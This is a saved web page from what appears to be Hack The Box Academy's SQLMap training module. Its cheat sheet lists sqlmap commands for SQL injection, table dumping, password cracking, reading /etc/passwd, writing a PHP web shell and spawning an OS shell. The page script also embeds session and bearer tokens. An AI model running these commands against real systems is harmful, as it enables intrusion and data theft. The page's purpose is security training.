<a href="https://academy.hackthebox.com/module/58/section/534" class="btn btn-light ml-2 module-button py-2" style="float: left">Next <i class="ml-1 fa fa-arrow-alt-right"></i></a>
</div>
</div>
</div>
<div class="col-md-12 col-xl-3 col-xxl-3">
<div id="table-of-contents">
<div class="card">
<div class="card-body bg-color-blue-nav">
<button class="btn btn-light btn-block module-button" data-toggle="modal" data-target="#cheatSheetModal"><i class="fad fa-file-alt mr-2"></i> Cheat Sheet</button>
<a href="https://academy.hackthebox.com/module/58/section/697#questionsDiv" class="btn btn-light btn-block module-button"><i class="fad fa-question mr-2"></i> Go to Questions</a>
</div>
</div>
<div class="card" id="TOC">
<div class="card-body bg-color-blue-nav">
<h5 class="card-title font-size-15 mb-4">Table of Contents</h5>
<h6 class="mt-4 mb-2">Getting Started</h6> <a href="https://academy.hackthebox.com/module/58/section/509" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<span class="font-size-13">SQLMap Overview</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/694" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<span class="font-size-13">Getting Started with SQLMap</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/696" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<span class="font-size-13">SQLMap Output Description</span>
</a>
<h6 class="mt-4 mb-2">Building Attacks</h6> <a href="https://academy.hackthebox.com/module/58/section/517" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Running SQLMap on an HTTP Request</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/695" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<span class="font-size-13">Handling SQLMap Errors</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/526" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Attack Tuning</span>
</a>
<h6 class="mt-4 mb-2">Database Enumeration</h6> <a href="https://academy.hackthebox.com/module/58/section/510" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Database Enumeration</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/529" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Advanced Database Enumeration</span>
</a>
<h6 class="mt-4 mb-2">Advanced SQLMap Usage</h6> <a href="https://academy.hackthebox.com/module/58/section/530" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Bypassing Web Application Protections</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/697" class="btn   text-primary  btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">OS Exploitation</span>
</a>
<h6 class="mt-4 mb-2">Skills Assessment</h6> <a href="https://academy.hackthebox.com/module/58/section/534" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Skills Assessment</span>
</a>
</div>
</div>
<div class="card">
<div class="card-body bg-color-blue-nav">
<h5 class="card-title mb-4">My Workstation</h5>
<div class="row">
<div class="col-12">
<div id="sidePreview" style="height: 160px; border: 1px solid #323232; border-radius: 5px; background-color: #0a121c; text-align: center">
<div class="screenPlaceholder">
<p class="instanceStart" style="padding-top:70px; letter-spacing: 5px;">OFFLINE</p>
<p class="instanceLoading " style="padding-top:70px; display: none"><i class="fa fa-circle-notch fa-spin"></i> Starting...</p>
</div>
</div>
</div>
<div class="col-12 mt-2">
<div class="instanceStart">
<button class=" startInstanceBtn btn btn-light btn-sm mt-2 btn-block module-button py-2"><i class="fad fa-play-circle text-success"></i> &nbsp;Start Instance</button>
<p class="text-center mt-2 font-size-13 font-secondary">
<span class="text-success spawnsLeft">
<i class="fal fa-infinity"></i>
</span> / 1 spawns left
</p>
</div>
<button style="display:none;" class="fullScreenBtn btn btn-light btn-sm mt-2 module-button py-2"><i class="fad fa-expand text-success"></i> &nbsp;Interact</button>
<button style="display:none;" class="terminateInstanceBtn btn btn-light btn-sm mt-2 module-button py-2"><i class="fad fa-times text-danger"></i> &nbsp;Terminate</button>
<button style="display:none;" class="resetInstanceBtn btn btn-light btn-sm mt-2 module-button py-2"><i class="fad fa-sync text-warning"></i> &nbsp;Reset</button>
<div class="btn-group" role="group">
<button style="display:none; cursor: default;" class=" extendInstanceBtn btn btn-light btn-sm mt-2 module-button py-2">Life Left: <span class="lifeLeft"></span>m</button>
<button style="display:none;" data-toggle="tooltip" data-title="Extend Life" class=" extendInstanceBtn extendInstanceBtnClicker btn btn-light btn-sm mt-2 module-button py-2" data-original-title="" title=""><i class="fa fa-plus text-success"></i></button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="hint434" class="modal fade" tabindex="-1" role="dialog" aria-labelledby="hint434" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered">
<div class="modal-content">
<div class="modal-body">
<div class="text-center">
 <h5><i class="fad fa-life-ring text-success"></i>&nbsp; Hint</h5>
<br>
<h6></h6>
</div>
</div>
</div>
</div>
</div>
<div id="hint435" class="modal fade" tabindex="-1" role="dialog" aria-labelledby="hint435" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered">
<div class="modal-content">
<div class="modal-body">
<div class="text-center">
<h5><i class="fad fa-life-ring text-success"></i>&nbsp; Hint</h5>
<br>
<h6>The flag is in a very common directory!</h6>
</div>
</div>
</div>
</div>
</div>
<div id="cheatSheetModal" class="modal fade" tabindex="-1" role="dialog" aria-labelledby="unlockModuleModal" aria-hidden="true">
<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-body">
<div class="text-center text-break">
<h5><i class="fad fa-file-alt"></i>&nbsp; Cheat Sheet</h5>
<p>The cheat sheet is as a useful command reference for this module.</p>
<div class="table-responsive"><table class="table table-striped text-left">
<thead>
<tr>
<th><strong>Command</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td><code>sqlmap -h</code></td>
<td>View the basic help menu</td>
</tr>
<tr>
<td><code>sqlmap -hh</code></td>
<td>View the advanced help menu</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/vuln.php?id=1" --batch</code></td>
<td>Run <code>SQLMap</code> without asking for user input</td>
</tr>
<tr>
<td><code>sqlmap 'http://www.example.com/' --data 'uid=1&amp;name=test'</code></td>
<td><code>SQLMap</code> with POST request</td>
</tr>
<tr>
<td><code>sqlmap 'http://www.example.com/' --data 'uid=1*&amp;name=test'</code></td>
<td>POST request specifying an injection point with an asterisk</td>
</tr>
<tr>
<td><code>sqlmap -r req.txt</code></td>
<td>Passing an HTTP request file to <code>SQLMap</code></td>
</tr>
<tr>
<td><code>sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'</code></td>
<td>Specifying a cookie header</td>
</tr>
<tr>
<td><code>sqlmap -u www.target.com --data='id=1' --method PUT</code></td>
<td>Specifying a PUT request</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt</code></td>
<td>Store traffic to an output file</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch</code></td>
<td>Specify verbosity level</td>
</tr>
<tr>
<td><code>sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"</code></td>
<td>Specifying a prefix or suffix</td>
</tr>
<tr>
<td><code>sqlmap -u www.example.com/?id=1 -v 3 --level=5</code></td>
<td>Specifying the level and risk</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba</code></td>
<td>Basic DB enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --tables -D testdb</code></td>
<td>Table enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname</code></td>
<td>Table/row enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"</code></td>
<td>Conditional enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --schema</code></td>
<td>Database schema enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --search -T user</code></td>
<td>Searching for data</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --passwords --batch</code></td>
<td>Password enumeration and cracking</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/" --data="id=1&amp;csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"</code></td>
<td>Anti-CSRF token bypass</td>
</tr>
<tr>
<td><code>sqlmap --list-tampers</code></td>
<td>List all tamper scripts</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba</code></td>
<td>Check for DBA privileges</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"</code></td>
<td>Reading a local file</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"</code></td>
<td>Writing a file</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --os-shell</code></td>
<td>Spawning an OS shell</td>
</tr>
</tbody>
</table></div>
</div>
</div>
<div class="modal-footer">
<a class="btn btn-light btn-block" href="https://academy.hackthebox.com/module/cheatsheet/58">Download Cheatsheet</a>
</div>
</div>
</div>
</div>
</div>
<footer class="footer">
<div class="container-fluid">
<div class="row">
<div class="col-sm-6">
</div>
<div class="col-sm-6">
<div class="text-sm-right d-none d-sm-block">
Powered by &nbsp; <a href="https://www.hackthebox.com/" target="_blank"><img style="margin-bottom: 1px;" src="./SQLMap Essentials10_files/logo-htb.svg" height="20px"></a>
</div>
</div>
</div>
</div>
</footer>
</div>
</div>
</div>
<script src="./SQLMap Essentials10_files/jquery.min.js.download"></script>
<script src="./SQLMap Essentials10_files/bootstrap.bundle.min.js.download"></script>
<script src="./SQLMap Essentials10_files/metisMenu.min.js.download"></script>
<script src="./SQLMap Essentials10_files/simplebar.min.js.download"></script>
<script src="./SQLMap Essentials10_files/waves.min.js.download"></script>
<script src="./SQLMap Essentials10_files/toastr.min.js.download"></script>
<script src="./SQLMap Essentials10_files/axios.min.js.download"></script>
<script src="./SQLMap Essentials10_files/prism.js.download"></script>
<script src="./SQLMap Essentials10_files/main.js.download"></script>
<script>
    axios.defaults.headers.common = {
        'X-CSRF-TOKEN': 'OEgK0JdzOZwGIHHODUXYrzCqZr0uFSlpTj7r9g5E',
        'X-Requested-With': 'XMLHttpRequest',
        'Authorization': 'Bearer ' + 'jgfghW9jOUxTYrPOMG9i2ujbtUFdtKuilcFrKtLWJpv9gAzKxNnjcsm7Dg2wIx8ivYvDBp7jCWD5XRNP'
    };
</script>
<script>
    $('table').addClass('table table-striped text-left').wrap('<div class="table-responsive"></div>');

    $('.training-module a').attr('target','_blank').attr('rel','noopener nofollow');

    $( ".favouriteBtn" ).click(function() {
        let id = $(this).data('module-id');

        axios.get('/api/modules/favourite/'+id).then(response => {
            let data = response.data;
            if (data.fav === 1) {
                $(this).removeClass('far fa').addClass('fa');
                toastr["success"](data.message, "Success");
            } else {
                $(this).removeClass('far fa').addClass('far');
                toastr["success"](data.message, "Success");
            }
        });
    });

    function encode_utf8(string) {
    return unescape(encodeURIComponent(string));
  }

  $('.btnAnswer').click(function() {
    let question_id = $(this).data('question-id');
    $(this).attr('disabled', 1);
    let utf8EncodedString = encode_utf8($('#answer' + question_id).val());
    axios.post('/api/check/answer', {
      answer: btoa(utf8EncodedString),
      question_id: question_id
    }).then(response => {
      $(this).removeAttr('disabled');
      let data = response.data;
      if (data.success === 0) {
        toastr['error'](data.message, 'Error');
      } else {
        $(this).attr('disabled', 1);
        $('#answer' + question_id).attr('disabled', 1);
        $('#answer' + question_id).addClass('text-success');
        $('#hintBtn' + question_id).attr('disabled', 1);
        toastr['success'](data.message, 'Success');
        completeCheck();
      }
    });
  });

  $('.btnAnswerExercise').click(function() {
    let exercise_id = $(this).data('exercise-id');
    $(this).attr('disabled', 1);
    let utf8EncodedString = encode_utf8($(`#exerciseAnswer${exercise_id}`).val());
    axios.post(`/api/check/exercise/${exercise_id}/answer`, {
      answer: btoa(utf8EncodedString)
    }).then(response => {
      $(this).removeAttr('disabled');
      let data = response.data;
      if (data.success === 0) {
        toastr['error'](data.message, 'Error');
      } else {
        $(this).attr('disabled', 1);
        $(`#exerciseAnswer${exercise_id}`).attr('disabled', 1);
        $(`#exerciseAnswer${exercise_id}`).addClass('text-success');
        toastr['success'](data.message, 'Success');
      }
    });
  });

    
    $('.reveal-modal').click(e => {
        let id = $(e.target).data('exercise-id');
        $(`#revealExerciseAnswer${id}`).modal('hide');
    });

    $( document ).ready(function() {

        $('pre').filter(function () {
            return this.className.match(/\blanguage-/);
        }).each(function () {
            let heading = $(this).prevAll().closest('h4').last().text();

            if (this.className === ' language-shell-session') {
                wrapTerminal(this, heading);
            } else if (this.className === ' language-powershell-session') {
                wrapPSTerminal(this, heading);
            } else if (this.className === ' language-cmd-session') {
                wrapCMDTerminal(this, heading);
            } else if (this.className.startsWith(' language-')) {
                var language = this.className.split('-').pop();
                wrapCodeBlock(this,language);
            }
        });

        wrapBrowser($('.website-screenshot'));
        completeCheck();

        $("span:contains('[!bash!]')").html('<span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span>');
    });

    function completeCheck()
    {
        axios.get('/api/check/complete/697').then(response => {
            let data = response.data;
            if (data.success === 1) {
                if (data.completed === true) {
                    $('#completeBtn').show();
                }
            }
        });
    }

    function wrapTerminal(element, heading)
    {
        $(element).css('line-height', '0px');
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend(`
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title">${heading}</span>
                </div>
            `);
    }
    function wrapPSTerminal(element, heading)
    {
        $(element).css('background', '#012456').children().css('color','white');
        $(element).css('line-height', '0px');
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend(`
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title">${heading}</span>
                </div>
            `);
    }
    function wrapCMDTerminal(element, heading)
    {
        $(element).css('background', 'black').children().css('color','white');
        $(element).css('line-height', '0px');
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend(`
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title">${heading}</span>
                </div>
            `);
    }
    function wrapCodeBlock(element,lang)
    {
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend('<div class="window_top">Code: <span class="text-success">'+lang+'</div>');
    }
    function wrapBrowserOld(element)
    {
        $(element).css("border", "0px").css("border-radius","0");
        let url = element.data('url');
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend(`
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <input type="text" class="website-screenshot-url" disabled value="${url}">
                    <span class="float-right"><i class="fa fa-home"></i></span>
                </div>
            `);
    }
    function wrapBrowser(element)
    {
        $(element).css("border", "0px").css("border-radius","0");

        $(element).each( function(index,e) {
            let url = $(e).data('url');
            $(e).wrap('<div class="window_content"></div>')
                .parent().wrap('<div class="window_container"></div>')
                .prepend(`
                    <div class="window_top">
                        <span class="mr-2">
                            <i class="fa fa-arrow-circle-left"></i> <i class="fa fa-arrow-right"></i> <i class="fa fa-redo"></i> <i class="fa fa-home"></i>
                        </span>
                        <input type="text" class="website-screenshot-url" disabled value="${url}">
                        <span class="float-right"><i class="fa fa-bars"></i></span>
                    </div>
                `);
        })
    }
</script>
<script type="module">
    import RFB from '/assets/libs/vnc/core/rfb.js';

    let rfb;
    let sidePreview;
    let desktopName;
    let pwnboxActive = false;

    function connectedToServer(e) {
        status("Connected to " + desktopName);
        $('.fullScreenBtn').show();
        $('.resetInstanceBtn').show();
        $('.terminateInstanceBtn').show();
        $('.extendInstanceBtn').show();
        $('.instanceLoading').hide();
        $('.instanceStart').hide();
        $('.resetInstanceBtn').prop('disabled',false);
        $('.fullScreenBtn').prop('disabled',false);
        $('.extendInstanceBtn').prop('disabled',false);
        $('.terminateInstanceBtn').prop('disabled',false);

        document.querySelector('canvas').addEventListener('focus', (event) => {
            navigator.clipboard.readText()
                .then(text => {
                    writeToClipboard(text);
                })
                .catch(err => {
                    console.log('Something went wrong while accessing clipboard', err);
                })
        });

    }

    function disconnectedFromServer(e) {
        status("Disconnected");
        $('.screenPlaceholder').show();
        stopCountdown();
    }

    function clipboardReceived(e) {
        navigator.clipboard.writeText(e.detail.text)
            .then(() => {
                // Success!
            })
            .catch(err => {
                console.log('Something went wrong while copying to clipboard.', err);
            });
    }

    function updateDesktopName(e) {
        desktopName = e.detail.name;
    }

    function status(text) {
        console.log(text);
        $("#statusText").html(text);
    }

    function readQueryVariable(name) {
        const re = new RegExp('.*[?&]' + name + '=([^&#]*)'),
            match = document.location.href.match(re);

        if (match) {
            return decodeURIComponent(match[1]);
        }

        return null;
    }

    function writeToClipboard(text) {
        rfb.clipboardPasteFrom(text);
    }

    let host = '';
    let password = '';
    let countdown = '';
    let targetCountdown = '';
    let url= '';
    let spawnInterval = null;

    function getPwnbox() {
        axios.get('/api/get/pwnbox').then(response => {
            let data = response.data;

            if (spawnInterval !== null && data.instance.action_log !== null) {
                let error = data.instance.action_log.find(log => log.error === true);
                if (error) {
                    $('.resetInstanceBtn').prop('disabled',false);
                    $('.fullScreenBtn').prop('disabled',false);
                    $('.extendInstanceBtn').prop('disabled',false);
                    $('.terminateInstanceBtn').prop('disabled',false);
                    $('.instanceStart').show();
                    $('.instanceLoading').hide();
                    $('.startInstanceBtn').show();

                    clearInterval(spawnInterval);
                    disconnectedFromServer();

                    let errorMessage = `${error.text}. Please contact support.`;
                    toastr["error"](errorMessage, "Error");

                    status(errorMessage);
                    return;
                }
            }

            if (data.success === 1 && data.instance.vnc_password !== null) {
                if (data.instance.action_log.find(log => log.action === 'ready')) {
                    host = 'proxy-uk.htb-cloud.com/bird/' + data.instance.hostname;
                    password = data.instance.vnc_password;
                    $('.lifeLeft').html(data.instance.life_remaining);
                    startCountdown();
                    $('.screenPlaceholder').hide();
                    url = 'https://vnc.htb-cloud.com/index.html?host=' + host + '&password=' + password;
                    pwnboxActive = true;
                    connect();

                    if (spawnInterval !== null) {
                        clearInterval(spawnInterval);
                    }
                }
            } else {
                $('.screenPlaceholder').show();
            }

        });
    }

        function extendPwnbox() {
        axios.get('/api/extend/pwnbox').then(response => {
            let data = response.data;
            if (data.success === 1) {
                $('.lifeLeft').html(data.instance.life_remaining);
                stopCountdown();
                startCountdown();
                toastr["success"]("Time extended for 60 minutes.", "Success");
            } else {
                toastr["error"](data.message, "Error");
            }

        });
    }
    
    getPwnbox();

    function startCountdown() {
        countdown = setInterval(function() {
            let life = parseInt($('.lifeLeft').html()) -1;
            $('.lifeLeft').html(life)
        }, 60 * 1000);
    }

    function stopCountdown() {
        clearInterval(countdown);
    }

    function terminatePwnbox() {
        $('.resetInstanceBtn').prop('disabled',true);
        $('.terminateInstanceBtn').prop('disabled',true);
        $('.fullScreenBtn').prop('disabled',true);
        $('.extendInstanceBtn').prop('disabled',true);
        $('.instanceStart').hide();

        $('.instanceTerminating').show();

        status('Terminating Interactive Instance...');

        axios.delete('/api/terminate/pwnbox')
            .then(({ data }) => {
                if (data.success === 1) {
                    $('.startInstanceBtn').show();
                    $('.instanceStart').show();
                    $('.instanceTerminating').hide();
                    $('.resetInstanceBtn').hide();
                    $('.terminateInstanceBtn').hide();
                    $('.fullScreenBtn').hide();
                    $('.extendInstanceBtn').hide();

                    pwnboxActive = false;

                    toastr['success']('Instance has been terminated.', 'Success');
                } else {
                    toastr['error'](data.message, 'Error');
                    connect();
                    $('.resetInstanceBtn').prop("disabled", false);
                    $('.fullScreenBtn').prop('disabled',false);
                    $('.extendInstanceBtn').prop('disabled',false);
                    $('.terminateInstanceBtn').prop('disabled',false);
                }
            });
    }

    function startPwnbox() {
        $('.resetInstanceBtn').prop('disabled',true);
        $('.fullScreenBtn').prop('disabled',true);
        $('.extendInstanceBtn').prop('disabled',true);
        $('.terminateInstanceBtn').prop('disabled',true);
        $('.instanceStart').hide();
        $('.instanceLoading').show();
        $('.startInstanceBtn').hide();

        status("Starting Interactive Instance...");

        grecaptcha.ready(function() {
            grecaptcha.execute('6LeI6LsaAAAAAKgdStgBC6B4UVbXlpYNaYGN46Ah', {action: 'spawnPwnbox'}).then(function(token) {
                if (token) {
                    axios.get('/api/spawn/pwnbox?g-recaptcha-response= '+token).then(response => {
                        let data = response.data;
                        if (data.success === 1) {
                            spawnInterval = setInterval(() => {
                                getPwnbox();
                            }, 2000);
                        } else {
                            if(data.code === 1 || (data.code === 3 && pwnboxActive)) {
                                $('.resetInstanceBtn').prop("disabled", false);
                                $('.fullScreenBtn').prop('disabled',false);
                                $('.extendInstanceBtn').prop('disabled',false);
                                $('.terminateInstanceBtn').prop('disabled',false);
                                connect();

                                if (data.code === 3) {
                                    $('.instanceLoading').hide();
                                    startCountdown();
                                }
                            } else {
                                $('.startInstanceBtn').show();
                                $('.instanceStart').show();
                                $('.instanceLoading').hide();
                            }

                            toastr["error"](data.message, "Error");
                        }

                    });
                } else {
                    $('.resetInstanceBtn').prop('disabled',false);
                    $('.fullScreenBtn').prop('disabled',false);
                    $('.extendInstanceBtn').prop('disabled',false);
                    $('.terminateInstanceBtn').prop('disabled',false);
                    $('.instanceStart').show();
                    $('.instanceLoading').hide();
                    $('.startInstanceBtn').show();
                }
            });
        });
    }

    $('.fullScreenBtn').click(function() {
        window.open(url, "_blank");
    });

    $('.startInstanceBtn').click(function() {
        startPwnbox();
                spawnTarget();
            });

    $('.resetInstanceBtn').click(function() {
        $('.screenPlaceholder').show();
        $('.instanceStart').show();
                rfb.disconnect();
                sidePreview.disconnect();
        startPwnbox();
    });

    $('.terminateInstanceBtn').click(function() {
        $('.screenPlaceholder').show();
        $('.instanceStart').show();
                rfb.disconnect();
                sidePreview.disconnect();
        terminatePwnbox();
    });

    $('.extendInstanceBtnClicker').click(function() {
       extendPwnbox();
    });

    $('.resetTargetBtn').click(function(){
        $(this).prop('disabled',true);
                    spawnDocker();
                    });

    function connect() {
        status("Connecting to " + host.split('/')[2] + "...");

                rfb = new RFB(document.getElementById('screen'), 'wss://' + host,
            { credentials: { password: password } });
        //Listeners
        rfb.addEventListener("desktopname", updateDesktopName);
        rfb.addEventListener("clipboard",clipboardReceived);

        rfb.resizeSession = true;
        rfb.viewOnly = false;
        
        sidePreview = new RFB(document.getElementById('sidePreview'), 'wss://' + host,
            { credentials: { password: password } });

        sidePreview.addEventListener("connect",  connectedToServer);
        sidePreview.addEventListener("disconnect", disconnectedFromServer);

        sidePreview.resizeSession = false;
        sidePreview.viewOnly = true;
        sidePreview.scaleViewport = true;
    }

    $('.target, .targetIp').click(e => {
        if ($('.resetTargetBtn').is(':hidden')) return;
        navigator.clipboard.writeText($(e.target).html())
            .then(() => {
                toastr['success']('Target copied to clipboard', 'Success');
            })
            .catch(err => {
                console.log('Something went wrong while copying to clipboard.', err);
            });
    });

        $('.spawnTargetBtn').click(function() {
        spawnDocker();
    })

    function spawnDocker() {
        $('.target').html('<i class="fad fa-circle-notch fa-spin"></i> Target is spawning...');
        axios.get('/api/spawn/container/697').then(response => {
            let data = response.data;
            if (data.success === 1) {
                $('.target').html(data.instance.hostname+":"+data.instance.port);
                $('.targetIp').html(data.instance.hostname);
                $('.resetTargetBtn').show();
                $('.resetTargetBtn').prop('disabled',false);
                $('.targetLifeTimeContainer').show();
                $('.targetLifeTime').html(90);
                startTargetCountdown();
            } else {
                toastr["error"]("Target failed to spawn. Please try refreshing the page.", "Error");
                $('.target').html('<i class="fad fa-circle-notch fa-spin"></i> Target failed to spawn :(');
                $('.resetTargetBtn').prop('disabled',false);
            }
        });
    }
        
    function startTargetCountdown() {
        targetCountdown = setInterval(function() {
            let life = parseInt($('.targetLifeTime').html()) -1;
            $('.targetLifeTime').html(life)
            if (life == 0) {
                $('.targetLifeTimeContainer').hide();
            }
        }, 60 * 1000);
    }
</script>


<div><div class="grecaptcha-badge" data-style="bottomright" style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;"><div class="grecaptcha-logo"><iframe title="reCAPTCHA" src="./SQLMap Essentials10_files/anchor.html" width="256" height="60" role="presentation" name="a-cjksf02yjfi9" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"></iframe></div><div class="grecaptcha-error"></div><textarea id="g-recaptcha-response-100000" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div><iframe style="display: none;" src="./SQLMap Essentials10_files/saved_resource.html"></iframe></div><img src="./SQLMap Essentials10_files/adsct" height="1" width="1" style="display: none;"><img src="./SQLMap Essentials10_files/adsct(1)" height="1" width="1" style="display: none;"><iframe id="intercom-frame" style="position: absolute !important; opacity: 0 !important; width: 1px !important; height: 1px !important; top: 0 !important; left: 0 !important; border: none !important; display: block !important; z-index: -1 !important; pointer-events: none;" aria-hidden="true" tabindex="-1" title="Intercom" src="./SQLMap Essentials10_files/saved_resource(1).html"></iframe><div id="torrent-scanner-popup" style="display: none;"></div><div class="intercom-lightweight-app"><div class="intercom-lightweight-app-launcher intercom-launcher" role="button" tabindex="0" aria-label="Open Intercom Messenger" aria-live="polite"><div class="intercom-lightweight-app-launcher-icon intercom-lightweight-app-launcher-icon-open"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 28 32"><path d="M28 32s-4.714-1.855-8.527-3.34H3.437C1.54 28.66 0 27.026 0 25.013V3.644C0 1.633 1.54 0 3.437 0h21.125c1.898 0 3.437 1.632 3.437 3.645v18.404H28V32zm-4.139-11.982a.88.88 0 00-1.292-.105c-.03.026-3.015 2.681-8.57 2.681-5.486 0-8.517-2.636-8.571-2.684a.88.88 0 00-1.29.107 1.01 1.01 0 00-.219.708.992.992 0 00.318.664c.142.128 3.537 3.15 9.762 3.15 6.226 0 9.621-3.022 9.763-3.15a.992.992 0 00.317-.664 1.01 1.01 0 00-.218-.707z"></path></svg></div><div class="intercom-lightweight-app-launcher-icon intercom-lightweight-app-launcher-icon-minimize"><svg viewBox="0 0 16 14" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M.116 4.884l1.768-1.768L8 9.232l6.116-6.116 1.768 1.768L8 12.768.116 4.884z"></path></svg></div></div><style id="intercom-lightweight-app-style" type="text/css">
  @keyframes intercom-lightweight-app-launcher {
    from {
      opacity: 0;
      transform: scale(0.5);
    }
    to {
      opacity: 1;
      transform: scale(1);
    }
  }

  @keyframes intercom-lightweight-app-gradient {
    from {
      opacity: 0;
    }
    to {
      opacity: 1;
    }
  }

  @keyframes intercom-lightweight-app-messenger {
    from {
      opacity: 0;
      transform: translateY(20px);
    }
    to {
      opacity: 1;
      transform: translateY(0);
    }
  }

  .intercom-lightweight-app {
    position: fixed;
    z-index: 2147483001;
    width: 0;
    height: 0;
    font-family: intercom-font, "Helvetica Neue", "Apple Color Emoji", Helvetica, Arial, sans-serif;
  }

  .intercom-lightweight-app-gradient {
    position: fixed;
    z-index: 2147483002;
    width: 500px;
    height: 500px;
    bottom: 0;
    right: 0;
    pointer-events: none;
    background: radial-gradient(
      ellipse at bottom right,
      rgba(29, 39, 54, 0.16) 0%,
      rgba(29, 39, 54, 0) 72%);
    animation: intercom-lightweight-app-gradient 200ms ease-out;
  }

  .intercom-lightweight-app-launcher {
    position: fixed;
    z-index: 2147483003;
    bottom: 20px;
    right: 20px;
    width: 60px;
    height: 60px;
    border-radius: 50%;
    background: #85C700;
    cursor: pointer;
    box-shadow: 0 1px 6px 0 rgba(0, 0, 0, 0.06), 0 2px 32px 0 rgba(0, 0, 0, 0.16);
    animation: intercom-lightweight-app-launcher 250ms ease;
  }

  .intercom-lightweight-app-launcher:focus {
    outline: none;
    
  }

  .intercom-lightweight-app-launcher-icon {
    display: flex;
    align-items: center;
    justify-content: center;
    position: absolute;
    top: 0;
    left: 0;
    width: 60px;
    height: 60px;
    transition: transform 100ms linear, opacity 80ms linear;
  }

  .intercom-lightweight-app-launcher-icon-open {
    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-open svg {
    width: 28px;
    height: 32px;
  }

  .intercom-lightweight-app-launcher-icon-open svg path {
    fill: rgb(255, 255, 255);
  }

